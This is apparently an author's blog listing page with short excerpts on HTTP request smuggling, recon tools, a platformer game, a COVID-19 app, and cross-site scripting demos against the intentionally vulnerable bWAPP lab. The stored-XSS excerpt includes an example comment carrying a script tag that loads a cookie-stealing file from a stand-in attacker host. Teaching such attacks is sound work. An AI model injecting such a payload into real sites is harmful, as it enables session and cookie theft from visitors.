
What is HTTP Request Smuggling?

HTTP Request Smuggling is a critical, high-severity vulnerability. It was initially discovered by Watchfire back in 2005 and was later rediscovered by James Kettle (albinowax) in August 2019, who presented his research at DEF CON 27 and Black Hat USA. An HRS vulnerability allows an attacker to smuggle an ambiguous HTTP request as a second request inside one single HTTP request, bypassing the security controls of a website to gain access to unauthorized sensitive data and perform malicious activities. …



Why a portfolio site is essential for a Software developer?

A portfolio site is essential for every software developer to showcase projects and technical skills; it demonstrates what you can actually do beyond what your resume says. Your portfolio will be very helpful in the job search, because an employer can see your work directly, which makes it easier for them to evaluate whether you are suitable for the job. Nowadays it is quite essential for every software developer to maintain a web presence, such as an official GitHub account, a Twitter account and a website, so that you can reach out to developer communities and build a…



Introduction

Forest Assassin is a 2D adventure platformer game with easy controls and fun gameplay, which helps everyone get started. It is a classic platformer with wonderfully designed characters and world. To complete the game, collect all the coins and the trophy; try to collect all 100 gold coins to become the highest scorer in this adventure platformer. On your way you will face many obstacles and enemies, and you use your sword to fight the enemy.

How to play the game on desktop browser?

To make it easier for the user I have also…



Coronavirus (COVID-19) — Full Stack Application

What is Coronavirus (COVID-19)?

Coronavirus (COVID-19) is an infectious disease that causes respiratory illness, with flu-like symptoms such as cough, fever and difficulty breathing. On December 31, 2019, the first case was recorded in Wuhan, China; the virus later spread around the world, and as of now around 1 million+ confirmed cases have been recorded since then.

You can protect yourself from this virus by following basic precautions like washing your hands frequently, avoiding touching your face, maintaining a distance of (1 meter or 3 feet) between people and, most importantly, if you are sick, immediately calling for…



Information gathering is the most important stage of every penetration test, because it gives you a better understanding of your target before you try to exploit vulnerabilities, collecting information such as IP addresses, subdomains, open ports and so on. To gather this information you need proper reconnaissance tools. There are many recon tools available on GitHub, but among them I found the top 10 recon tools which you can use to gather all of this information about your target.

This article is actually published at https://hackbotone.com/blog/10-recon-tools-for-bug-bounty

Important Note

Always remember that before scanning your target you should have proper authorization; otherwise you should…



Introduction

The HackbotOne website produces content from various domains such as Web Hacking, Bug Bounty, Application Development and Game Development.

This article is actually published at https://hackbotone.com/blog/hackbotone-full-stack-application

Which type of content can you expect?

Application Development

I will publish content for both web and mobile platforms, for example (Android, Node.js, MongoDB, Go, Reactjs, React-Native and many more), related to application development. I'll try to cover those topics with step-by-step explanations, and in this section I'll mostly cover programming.

Game Development

Mostly you can expect content from the Unity3d game engine platform, and I'll try to make small video tutorial…



This is a demonstration of a Stored Cross-Site Scripting attack in SQLiteManager and the User-Agent header. For this demo I'll be using bWAPP, a buggy web application that we can use to test various web vulnerabilities.

bWAPP Official Link:- http://www.itsecgames.com/

How to perform a Stored Cross-Site Scripting attack in SQLiteManager?



This is a demonstration of a Stored Cross-Site Scripting attack in Change Secret and Cookies. For this demo I'll be using bWAPP, a buggy web application that we can use to test various web vulnerabilities.

bWAPP Official Link:- http://www.itsecgames.com/

How to perform a Stored Cross-Site Scripting attack in Change Secret?



Introduction to Stored XSS

When an attacker browsing a web application finds a vulnerability that allows them to embed an HTML tag into an input box, the embedded tag becomes a permanent item of that page, and the browser will parse this code every time the page is loaded.

For example, on a blogging website the attacker finds a vulnerability in the comment section and embeds this comment.

Attacker's Comment: Nice Blog! I have also written a similar type of blog but with some new content, please visit my site to read more

<script src="http://attacker.com/stealcookie.js">…



Cross-site-Scripting — Reflected (phpMyAdmin & PHP_SELF)

This is a demonstration of a Cross-Site Scripting attack in phpMyAdmin and PHP_SELF. For this demo I'll be using bWAPP, a buggy web application that we can use to test various web vulnerabilities.

bWAPP Official Link:- http://www.itsecgames.com/

How to perform a Cross-Site Scripting attack in phpMyAdmin?

Anshuman Pattnaik

I am a developer and have worked on various platforms and frameworks such as Android, Unity3d, Node.js, Go, React/Redux, VR/AR and also Blockchain and Web security.
